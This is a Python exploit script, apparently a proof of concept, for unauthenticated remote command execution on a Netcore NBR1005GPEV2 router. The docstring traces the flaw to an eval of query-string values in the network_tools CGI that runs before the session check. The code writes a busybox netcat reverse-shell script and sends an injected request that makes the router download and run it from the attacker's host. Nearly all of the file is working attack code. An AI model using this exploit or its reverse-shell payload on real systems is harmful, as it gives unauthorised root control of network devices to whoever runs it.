#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Netcore NBR1005GPEV2  V1.3.241107.015153  -  Unauthenticated RCE (CWE-78)
=========================================================================
File:   www/cgi-bin/network_tools
Root cause:
    The QUERY_STRING is parsed by
        eval "${key}='${val}'"
    inside a while-loop that runs *before* the session-id / permission
    check (the `if [ ${#sid} -ne 32 ]` / `ubus call session access`
    guards sit AFTER the loop). uhttpd hands QUERY_STRING to CGI verbatim
    (it does NOT url-decode it), so an attacker controls every literal
    byte of `val`. Inject a single quote to break out of the eval string
    and execute an arbitrary command -- with NO authentication.

Exploit:
    eval line becomes:
        sid='a';<CMD>;''      (<CMD> executed as root/www-data)

    Spaces are illegal in an HTTP request-target, so spaces inside <CMD>
    are replaced with ${IFS}.

Usage (run on the WINDOWS host that can reach the VM/image):
    1. serve this folder:        python -m http.server 80
    2. catch the reverse shell:  nc -lvvp 4444
    3. fire the exploit:
         python exp_network_tools.py <image_ip> 80 <win_host_ip> 80 4444
"""
import sys, socket, os

HERE = os.path.dirname(os.path.abspath(__file__))

def http_raw(host, port, raw_path, timeout=8):
    s = socket.create_connection((host, port), timeout=timeout)
    req = ("GET {p} HTTP/1.1\r\nHost: {h}\r\nUser-Agent: nbr-poc\r\n"
           "Connection: close\r\n\r\n").format(p=raw_path, h=host)
    s.sendall(req.encode("latin1"))
    buf = b""
    try:
        while True:
            c = s.recv(4096)
            if not c:
                break
            buf += c
    finally:
        s.close()
    return buf

def write_shellsh(attacker, revport):
    """Drop a mipsel-busybox reverse-shell script next to this exp so the
    `python -m http.server` on the attacker serves it."""
    p = os.path.join(HERE, "shell.sh")
    with open(p, "w", newline="\n") as f:
        f.write("#!/bin/sh\n")
        f.write("# auto-generated by exp_network_tools.py\n")
        f.write("RHOST=%s\nRPORT=%s\n" % (attacker, revport))
        f.write("export PATH=/bin:/sbin:/usr/bin:/usr/sbin\n")
        # busybox nc with -e first, mkfifo trick as fallback
        f.write("/bin/busybox nc $RHOST $RPORT -e /bin/sh 2>/dev/null || \\\n")
        f.write("(mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/busybox nc $RHOST $RPORT >/tmp/f)\n")
    print("[+] wrote %s (RHOST=%s RPORT=%s)" % (p, attacker, revport))

def main():
    if len(sys.argv) < 3:
        print(__doc__); sys.exit(1)
    target  = sys.argv[1]
    port    = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    atk     = sys.argv[3] if len(sys.argv) > 3 else "192.168.1.100"
    webport = sys.argv[4] if len(sys.argv) > 4 else "80"
    revport = sys.argv[5] if len(sys.argv) > 5 else "4444"

    write_shellsh(atk, revport)

    # eval ->  sid='a';wget ...;sh ...;''
    cmd = ("wget${IFS}http://{a}:{w}/shell.sh${IFS}-O${IFS}/tmp/s.sh;"
           "chmod${IFS}777${IFS}/tmp/s.sh;sh${IFS}/tmp/s.sh").format(a=atk, w=webport)
    val  = "a';%s;'" % cmd
    path = "/cgi-bin/network_tools?sid=%s" % val   # literal special chars == the bug

    print("[*] target   : %s:%d" % (target, port))
    print("[*] attacker : %s (web %s / rev %s)" % (atk, webport, revport))
    print("[*] payload  : %s" % path)
    print("[*] expect: GET /shell.sh on http.server, then shell on nc")
    try:
        resp = http_raw(target, port, path)
        head = resp.split(b"\r\n\r\n", 1)[0].decode("latin1", "replace")
        print("[*] response head:\n%s" % head)
    except Exception as e:
        print("[!] error: %s" % e)

if __name__ == "__main__":
    main()
